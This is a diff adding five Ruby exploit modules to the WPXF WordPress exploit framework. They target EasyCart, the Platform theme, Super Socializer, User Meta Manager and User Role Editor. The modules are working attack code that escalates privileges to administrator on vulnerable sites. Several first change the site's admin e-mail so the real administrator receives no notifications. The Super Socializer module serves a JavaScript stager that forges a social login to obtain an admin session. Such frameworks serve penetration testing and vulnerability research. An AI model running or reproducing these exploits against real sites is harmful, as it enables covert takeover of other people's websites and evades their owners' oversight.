wpxf 2.0.0a

data/lib/wpxf/modules/auxiliary/priv_esc/easy_cart_privilege_escalation.rb

@@ -0,0 +1,92 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::EasyCartPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+
+  def initialize
+    super
+
+    update_info(
+      name: 'EasyCart Plugin Privilege Escalation',
+      desc: %(
+        The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20
+        allows authenticated users  of any user level to set any system
+        option via a lack of validation in the ec_ajax_update_option and
+        ec_ajax_clear_all_taxrates functions located in /inc/admin/admin_ajax_functions.php.
+
+        The module first changes the admin e-mail address to prevent any
+        notifications being sent to the actual administrator during the
+        attack, re-enables user registration in case it has been disabled
+        and sets the default role to be administrator. This will allow
+        for the user to create a new account with admin privileges via
+        the default registration page found at /wp-login.php?action=register.
+      ),
+      desc_preformatted: true,
+      author: [
+        'rastating' # Discovery and WPXF module
+      ],
+      references: [
+        ['CVE', '2015-2673'],
+        ['WPVDB', '7808'],
+        ['URL', 'http://blog.rastating.com/wp-easycart-privilege-escalation-information-disclosure']
+      ],
+      date: 'Feb 25 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-easycart', '3.0.21', '1.1.30')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def set_wp_option(name, value)
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      params: { 'action' => 'ec_ajax_update_option' },
+      body: { 'option_name' => name, 'option_value' => value },
+      cookie: session_cookie
+    )
+
+    if res.nil?
+      emit_error 'No response from the target', true
+    elsif res.code != 200
+      emit_warning "Server responded with code #{res.code}", true
+    end
+
+    res
+  end
+
+  def run
+    return false unless super
+
+    new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
+    emit_info "Changing admin e-mail address to #{new_email}..."
+    if set_wp_option('admin_email', new_email).nil?
+      emit_error 'Failed to change the admin e-mail address'
+      return false
+    end
+
+    emit_info 'Enabling user registrations...'
+    if set_wp_option('users_can_register', 1).nil?
+      emit_error 'Failed to enable user registrations'
+      return false
+    end
+
+    emit_info 'Setting the default user role...'
+    if set_wp_option('default_role', 'administrator').nil?
+      emit_error 'Failed to set the default user role'
+      return false
+    end
+
+    register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
+    emit_success 'Privilege escalation complete'
+    emit_success "Create a new account at #{register_url} to gain admin access."
+
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/platform_privilege_escalation.rb

@@ -0,0 +1,93 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::PlatformPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+  include Wpxf::WordPress::Login
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Platform Theme Privilege Escalation',
+      desc: %(
+        This module exploits a privilege escalation vulnerability in
+        versions < 1.4.4 of the Platform theme which allows authenticated
+        users of any level to update any WordPress option.
+
+        The module first changes the admin e-mail address to prevent any
+        notifications being sent to the actual administrator during the
+        attack, re-enables user registration in case it has been
+        disabled and sets the default role to be administrator.
+        This will allow for the user to create a new account with admin
+        privileges via the default registration page found at
+        /wp-login.php?action=register.
+      ),
+      desc_preformatted: true,
+      author: [
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
+      ],
+      references: [
+        ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
+        ['WPVDB', '7762']
+      ],
+      date: 'Jan 21 2015'
+    )
+  end
+
+  def check
+    check_theme_version_from_style('platform', '1.4.4')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def set_wp_option(name, value)
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      params: { 'action' => 'pagelines_ajax_save_option' },
+      body: { 'option_name' => name, 'option_value' => value },
+      cookie: session_cookie
+    )
+
+    if res.nil?
+      emit_error 'No response from the target', true
+    elsif res.code != 200
+      emit_warning "Server responded with code #{res.code}", true
+    elsif res.code == 200
+      emit_success "Option \"#{name}\" appears to have been set", true
+    end
+
+    res
+  end
+
+  def run
+    return false unless super
+
+    new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
+    emit_info "Changing admin e-mail address to #{new_email}..."
+    if set_wp_option('admin_email', new_email).nil?
+      emit_error 'Failed to change the admin e-mail address'
+      return false
+    end
+
+    emit_info 'Enabling user registrations...'
+    if set_wp_option('users_can_register', 1).nil?
+      emit_error 'Failed to enable user registrations'
+      return false
+    end
+
+    emit_info 'Setting the default user role...'
+    if set_wp_option('default_role', 'administrator').nil?
+      emit_error 'Failed to set the default user role'
+      return false
+    end
+
+    register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
+    emit_success 'Privilege escalation complete'
+    emit_success "Create a new account at #{register_url} to gain admin access."
+
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb

@@ -0,0 +1,154 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::SuperSocializerAuthBypass < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Super Socializer <= 7.10.6 Authentication Bypass',
+      desc: %(
+        Super Socializer <= 7.10.6 is vulnerable to an
+        authentication bypass exploit if an attacker is
+        in posession of an admin's e-mail address and the
+        social login feature is enabled.
+
+        This module will launch a HTTP server, which when
+        visited will automate the bypass process, and
+        provide an admin session.
+      ),
+      author: [
+        'rastating' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '9043']
+      ],
+      date: 'Mar 03 2018'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'admin_email',
+        desc: 'The e-mail address of the admin user to authenticate as',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('super-socializer', '7.10.7')
+  end
+
+  def stager
+    %(
+      <html>
+      <head>
+      </head>
+      <body>
+        <script>
+          var url = '#{full_uri}',
+            email = '#{datastore['admin_email']}',
+            nonce = '#{login_nonce}';
+
+          function exploit() {
+            var param = {
+              action: 'the_champ_user_auth',
+              security: nonce,
+              'profileData[id]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
+              'profileData[link]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
+              'profileData[name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
+              'profileData[email]': email,
+              'profileData[first_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
+              'profileData[last_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
+              provider: 'facebook',
+              redirectionUrl: encodeURI(url)
+            };
+            var wnd = OpenWindowWithPost("#{wordpress_url_admin_ajax}",
+              "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);
+
+
+            setTimeout(function() {
+              wnd.close();
+              window.location.replace("#{wordpress_url_admin}");
+            }, 2000);
+          }
+
+          function OpenWindowWithPost(url, windowoption, name, params) {
+            var form = document.createElement("form");
+            form.setAttribute("method", "post");
+            form.setAttribute("action", url);
+            form.setAttribute("target", name);
+
+            for (var i in params) {
+              if (params.hasOwnProperty(i)) {
+                var input = document.createElement('input');
+                input.type = 'hidden';
+                input.name = i;
+                input.value = params[i];
+                form.appendChild(input);
+              }
+            }
+
+            document.body.appendChild(form);
+
+            var wnd = window.open("", name, windowoption);
+
+            form.submit();
+
+            document.body.removeChild(form);
+
+            return wnd;
+          }
+
+          document.addEventListener("DOMContentLoaded", function(event) {
+            exploit();
+          })
+        </script>
+      </body>
+      </html>
+    )
+  end
+
+  def on_http_request(*)
+    emit_info 'Serving stager...'
+    {
+      type: 'text/html',
+      body: stager
+    }
+  end
+
+  def fetch_nonce
+    emit_info 'Fetching a login nonce...'
+    res = execute_get_request(url: wordpress_url_login)
+    return false unless res&.code == 200
+
+    pattern = /var\sthe_champ_sl_ajax_token\s=\s{"ajax_url":".+?","security":"([a-z0-9]+?)"};/i
+    self.login_nonce = res.body[pattern, 1]
+
+    if login_nonce.nil?
+      emit_error 'Failed to fetch a login nonce'
+      return false
+    else
+      emit_success "Found nonce: #{login_nonce}", true
+      return true
+    end
+  end
+
+  def run
+    return false unless super
+    return false unless fetch_nonce
+
+    address = http_server_bind_address
+    address = 'localhost' if address == '0.0.0.0'
+
+    emit_info "Visit http://#{address}:#{http_server_bind_port} to login."
+    emit_warning 'If your browser blocks the popup, be sure to allow it.'
+
+    start_http_server
+    true
+  end
+
+  attr_accessor :login_nonce
+end

data/lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb

@@ -0,0 +1,76 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::UserMetaManagerPrivilegeEscalation < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'User Meta Manager <= 3.4.6 Privilege Escalation',
+      desc: %(
+        The User Meta Manager plugin, up to and including version
+        3.4.6, allows authenticated users of any level to update the
+        role of any user to be an administrator.
+      ),
+      author: [
+        'Panagiotis Vagenas', # Vulnerability discovery
+        'rastating'           # WPXF module
+      ],
+      references: [
+        ['URL', 'http://seclists.org/bugtraq/2016/Feb/34'],
+        ['WPVDB', '8379']
+      ],
+      date: 'Feb 04 2016'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'user_id',
+        desc: 'The ID of the user to make an admin',
+        required: true
+      )
+    ])
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def user_id
+    normalized_option_value('user_id')
+  end
+
+  def check
+    check_plugin_version_from_readme('user-meta-manager', '3.4.7')
+  end
+
+  def run
+    return false unless super
+
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      params: {
+        'action' => 'umm_switch_action',
+        'umm_sub_action' => 'umm_update_user_meta',
+        'umm_user' => user_id.to_s
+      },
+      body: {
+        'mode' => 'edit',
+        'umm_meta_value[]' => 'a:1:{s:13:"administrator";b:1;}',
+        'umm_meta_key[]' => 'wp_capabilities'
+      },
+      cookie: session_cookie
+    )
+
+    if res.code == 200 && res.body =~ /Meta data successfully updated/i
+      emit_success "User #{user_id} now has full admin rights"
+      return true
+    else
+      emit_error "Response code: #{res.code}", true
+      emit_error "Response body: #{res.body}", true
+      emit_error 'Failed to escalate privileges'
+      return false
+    end
+  end
+end

data/lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb

@@ -0,0 +1,57 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::UserRoleEditorPrivilegeEscalation < Wpxf::Module
+  include Wpxf::WordPress::User
+
+  def initialize
+    super
+
+    update_info(
+      name: 'User Role Editor <= 4.24 Privilege Escalation',
+      desc: 'The User Role Editor plugin, in versions 4.24 and below, '\
+            'allows authenticated users to escalate their user role to '\
+            'that of an administrator.',
+      author: [
+        'rastating' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8432'],
+        ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
+      ],
+      date: 'Apr 04 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('user-role-editor', '4.25')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def build_update_body
+    fields = wordpress_user_profile_form_fields(session_cookie)
+    return nil unless fields
+    fields.merge('ure_other_roles' => 'administrator')
+  end
+
+  def run
+    return false unless super
+
+    body = build_update_body
+    unless body
+      emit_error 'Failed to build payload'
+      return false
+    end
+
+    res = execute_post_request(url: wordpress_url_admin_profile, body: body, cookie: session_cookie)
+    unless res.code == 302 || res.code == 200
+      emit_error "Request returned code #{res.code}"
+      return false
+    end
+
+    emit_success "User role for #{datastore['username']} has been escalated to administrator"
+    true
+  end
+end